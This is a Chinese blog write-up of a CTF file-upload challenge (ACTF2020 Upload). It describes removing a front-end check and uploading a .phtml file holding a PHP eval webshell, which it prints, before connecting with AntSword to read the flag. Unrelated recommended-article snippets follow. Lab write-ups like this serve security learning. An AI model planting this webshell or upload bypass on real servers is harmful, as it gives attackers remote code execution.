[ACTF2020 新生赛]Upload-1

最新推荐文章于 2024-03-29 00:08:19 发布
置顶 最新推荐文章于 2024-03-29 00:08:19 发布
阅读量4.7k 收藏 17
点赞数 16
分类专栏: Web安全 BUUCTF 信息安全 信息安全 文章标签: sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45731468/article/details/120661443
版权

小编今天又来写文章啦,距离上次写文章过了一个多月,小编前段时间太忙,好久没更新文章了。现在小编回来继续做着安全的题目,这次是一个BUUCTF平台的一到文件上传漏洞题。以下为小编为小伙伴们的解题思路:,

1、题目内容,

鼠标放在灯泡上发现存在文件上传。

2、随便上传一张图片,如下可得图片上传保存的地址,访问试试看

3、试着上传php一句话马文件,出现只能上传图片

4、Burp抓包发现,对文件格式只在前台验证好办多了,思路:先上传一张一句话马图片,抓包将图片尾缀改为php文件,发现原来不仅在前台校验,后台也做了校验。

5、可以创建一个test.phtml文件。对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。将以下代码写入该文件中。

<script language='php'>@eval($_POST['a']);</script>

<script language='php'>system('cat /flag');</script>

(1)删除前台点击校验文件事件

(2)上传含一句话木马的.phtml文件。发现成功上传。

6、访问该文件。空白页面说明上传成功

7、蚁剑连接,并在根目录下 / 找到flag文件,打开可得flag

最后小编希望小伙伴们觉得还不错的话,就给你小编点个赞哈!你的点赞就是我继续前进的动力,大佬,大神,请绕道,不要欺负小编菜啦。

@木兰%%
关注
  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
eclips3.7 汉化包
10-05
自己下载后整理的,绝对能用, Babel Language Packs for Indigo Eclipse 3.7 BabelLanguagePack-birt-zh_3.7.0.v20110723043401.zip (91.74%) BabelLanguagePack-eclipse-zh_3.7.0.v20110723043401.zip (87.19%) BabelLanguagePack-modeling.emf.cdo-zh_3.7.0.v20110723043401.zip (25%) BabelLanguagePack-modeling.emft.emf-facet-zh_3.7.0.v20110723043401.zip (9.79%) BabelLanguagePack-modeling.gmp.graphiti-zh_3.7.0.v20110723043401.zip (20.45%) BabelLanguagePack-modeling.mdt.modisco-zh_3.7.0.v20110723043401.zip (5.65%) BabelLanguagePack-mylyn-zh_3.7.0.v20110723043401.zip (50.63%) BabelLanguagePack-rt.equinox-zh_3.7.0.v20110723043401.zip (99.27%) BabelLanguagePack-rt.equinox.p2-zh_3.7.0.v20110723043401.zip (22.2%) BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v20110723043401.zip (16.84%) BabelLanguagePack-technology.jgit-zh_3.7.0.v20110723043401.zip (2.72%) BabelLanguagePack-technology.jubula-zh_3.7.0.v20110723043401.zip (11.55%) BabelLanguagePack-technology.uomo-zh_3.7.0.v20110723043401.zip (3.6%) BabelLanguagePack-tools.cdt-zh_3.7.0.v20110723043401.zip (68.19%) BabelLanguagePack-tools.gef-zh_3.7.0.v20110723043401.zip (66.21%) BabelLanguagePack-tools.objectteams-zh_3.7.0.v20110723043401.zip (5.51%) BabelLanguagePack-webtools.dali-zh_3.7.0.v20110723043401.zip (18.4%) BabelLanguagePack-webtools.jsdt-zh_3.7.0.v20110723043401.zip (80.48%) BabelLanguagePack-webtools.jsf-zh_3.7.0.v20110723043401.zip (39.7%) BabelLanguagePack-webtools.libra-zh_3.7.0.v20110723043401.zip (26.04%) BabelLanguagePack-webtools.servertools-zh_3.7.0.v20110723043401.zip (88.15%) BabelLanguagePack-webtools.sourceediting-zh_3.7.0.v20110723043401.zip (74.53%) BabelLanguagePack-webtools.webservices-zh_3.7.0.v20110723043401.zip (75.76%)
Eclipse(中文语言包
11-26
Eclipse(中文语言包下载地址)Indigo,Helios,Galileo,Ganymede,Europa EclipseJSFMyeclipseLinux Babel Language Packs for Europa 3.3 (MyEclipse 6.5) • BabelLanguagePack-birt-zh_3.3.1.v20101211042632.zip(99.76%) • BabelLanguagePack-datatools-zh_3.3.1.v20101211042632.zip (100%) • BabelLanguagePack-eclipse-zh_3.3.1.v20101211042632.zip (98.09%) • BabelLanguagePack-webtools-zh_3.3.1.v20101211042632.zip (45.28%) Babel Language Packs for Ganymede Eclipse 3.4 • BabelLanguagePack-birt-zh_3.4.0.v20101211020322.zip (99.96%) • BabelLanguagePack-datatools-zh_3.4.0.v20101211020322.zip (100%) • BabelLanguagePack-dsdp.tm-zh_3.4.0.v20101211020322.zip (21.2%) • BabelLanguagePack-eclipse-zh_3.4.0.v20101211020322.zip (99.34%) • BabelLanguagePack-modeling.emft-zh_3.4.0.v20101211020322.zip (24.23%) • BabelLanguagePack-modeling.gmf-zh_3.4.0.v20101211020322.zip (34.18%) • BabelLanguagePack-modeling.m2m-zh_3.4.0.v20101211020322.zip (23.61%) • BabelLanguagePack-modeling.m2t-zh_3.4.0.v20101211020322.zip (24.88%) • BabelLanguagePack-modeling.mdt-zh_3.4.0.v20101211020322.zip (70.07%) • BabelLanguagePack-rt.equinox-zh_3.4.0.v20101211020322.zip (28.93%) • BabelLanguagePack-technology.jwt-zh_3.4.0.v20101211020322.zip (35.45%) • BabelLanguagePack-technology.mat-zh_3.4.0.v20101211020322.zip (3.29%) • BabelLanguagePack-tools.cdt-zh_3.4.0.v20101211020322.zip (83.4%) • BabelLanguagePack-tools.gef-zh_3.4.0.v20101211020322.zip (77.97%) • BabelLanguagePack-tptp.platform-zh_3.4.0.v20101211020322.zip (18.88%) • BabelLanguagePack-webtools-zh_3.4.0.v20101211020322.zip (82.37%) • BabelLanguagePack-webtools.sourceediting-zh_3.4.0.v20101211020322.zip (85.13%) Babel Language Packs for Galileo Eclipse 3.5 • BabelLanguagePack-datatools-zh_3.5.0.v20101211082259.zip (86.23%) • BabelLanguagePack-dsdp.mtj-zh_3.5.0.v20101211082259.zip (25.09%) • BabelLanguagePack-dsdp.tm-zh_3.5.0.v20101211082259.zip (24.79%) • BabelLanguagePack-eclipse-zh_3.5.0.v20101211082259.zip (96.21%) • BabelLanguagePack-modeling.emf-zh_3.5.0.v20101211082259.zip
[ACTF2020 新生]Upload1(详解)
2301_77451464的博客
02-04 830
buuctf web [ACTF2020 新生]Upload1(详解)
[ACTF2020 新生]Upload
最新发布
wikey 的博客
03-29 229
注意到我们的文件名是passwd.jpg但是我们写的木马是php木马也就是我们要把后缀名改为php才行。(这里是因为已经把content-Type改成了image/jpeg形式,也就是会模拟成jpeg形式)然后forward放包之后也会不行。完全是php写的,则使用php作为后缀名。phtml后缀也会被解析为php文件,这样同样能解析出php木马来。必须要上传jpg/png/gif结尾图片,那就必须要把木马改后缀。小灯泡打开就是文件上传,我们先习惯性上传一个php图片木马进去。
[ACTF2020 新生]Upload 1
qq_45972928的博客
09-29 1247
[ACTF2020 新生]Upload 1
BUUCTF-[ACTF2020 新生]Upload1
Monica的博客
09-22 1566
目录 题目: 分析: 题目: 打开之后啥也没有,鼠标放在中间的灯上面发现有文件上传的地方,猜测是一个文件上传漏洞 分析: 先随便上传一个文件,发现提示 并且bp抓包并没有抓到包,说明为前端检测过滤。 那就上传jpg,png,gif这三种类型的文件,然后bp抓包在修改后缀为php。 先上传一个jpg文件,内容为<?php phpinfo();?>。 发现后端还是进行了检查过滤 那就试试其他几种后缀: 绕过后缀的有文件格式有php,php3,php...
[ACTF2020 新生]Upload1
人若无名,便可专心练剑
03-19 889
[ACTF2020 新生]Upload1
[ACTF2020 新生]Upload1解题思路
xiyuanyue的博客
10-10 270
3、一次尝试其他类型的文件,其中.htaccess .ini .phtml 等文件都可以上传。1、通过源码分析前端允许.png .jpg .gif文件上传,文件上传后重置了文件名称。4、上传一句话木马,使用antSword连接,虚拟终端 ,返回到根目录获取flag。2、抓取接口修改文件后缀未.php提示 badfile,代码中对文件后缀做了校验。php 服务器可以把其他后缀的文件解析后可作为代码运行。
文件上传 [ACTF2020 新生]Upload1
m0_75178803的博客
11-12 543
上传htaccess文件的时候,因为有前端校验,我们把前端校验删了以后发现能够成功上传htaccess文件,但是接着上传jpg格式的一句话木马时却连不上。.phtml文件告诉网络服务器,这些文件是由服务器生成的带有动态内容的html文件,就像浏览器中的.php文件表现一样。最开始我想到的做法是先上传htaccess文件,bp修改文件头,上传成功后然后再上传以jpg为文件后缀的一句话木马。发现网站前端有白名单限制,只能上传含有jpg,png,gif的后缀文件。打开题目,发现是一道文件上传题目。
(文件上传upload) [极客大挑战 2019]Upload1 和 [ACTF2020新生]Upload1
一醉一休的博客
02-23 8541
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客大挑战 2019]Upload1 ...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件演示版使用CocoaPods进行安装播客文件Podfile添加到您的Podfile : pod 'PPJEmailPicker'用法以编程方式第1步-导入标题# import " PPJEmailPicker.h "第2步-创建...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
buuctf [ACTF2020 新生]Upload 1
Naptmn的博客
02-24 1171
直接上传一个php的一句话发现无法上传 f12找到前端验证 这里有两个方法 1、直接删除这个元素 2、先上传jpg格式的一句话,bp抓包改为php 发现上传后后端仍然有检查 于是我们上传phtml格式的一句话木马(这里同样需要绕开前端验证) phtml可以理解为是另外一个php的文件后缀名 上传成功后蚁剑连接即可 ...
2021.3.11 [ACTF2020 新生]Upload 1
weixin_52433547的博客
03-11 755
记录一道文件上传的题目 进去之后看见这个界面,鼠标移动到灯泡后会提醒你上传文件 我们先试着上传木马,发现限制了只能上传png等格式的文件 我们进行代码审计,发现执行文件上传的代码在这儿 <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 嘿伙计,你发现它了! <input class="input_file" type="file" nam
[ACTF2020 新生]BackupFile 1
07-25
鉴于提供的引用内容,\[ACTF2020 新生\]BackupFile 1是一道题目,它涉及到备份文件的寻找和查看。常见的备份文件包括“.git”、“.svn”、“.swp”、“.~”、“.bak”、“.bash_history”、“.bkf”。可以使用dirsearch工具进行目录扫描,找到备份文件的位置。然后访问该链接,下载文件并打开查看。在这个题目中,打开的是一个PHP文件,其中包含了一个弱类型比较的逻辑。通过让key=123进行访问,可以看到flag。\[1\] 源码中的逻辑是,如果存在$_GET\['key'\],则将其赋值给$key。如果$key不是一个数字,则输出"Just num!"。然后将$key转化为整数,并与字符串$str进行比较。如果相等,则输出$flag。否则,输出"Try to find out source file!"。\[2\]\[3\] #### 引用[.reference_title] - *1* [[ACTF2020 新生]BackupFile 1](https://blog.csdn.net/qq_44122254/article/details/125927517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[ACTF2020 新生]BackupFile1](https://blog.csdn.net/m0_73728268/article/details/129497240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUUCTF-[ACTF2020 新生]BackupFile1](https://blog.csdn.net/qq_46918279/article/details/120619373)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值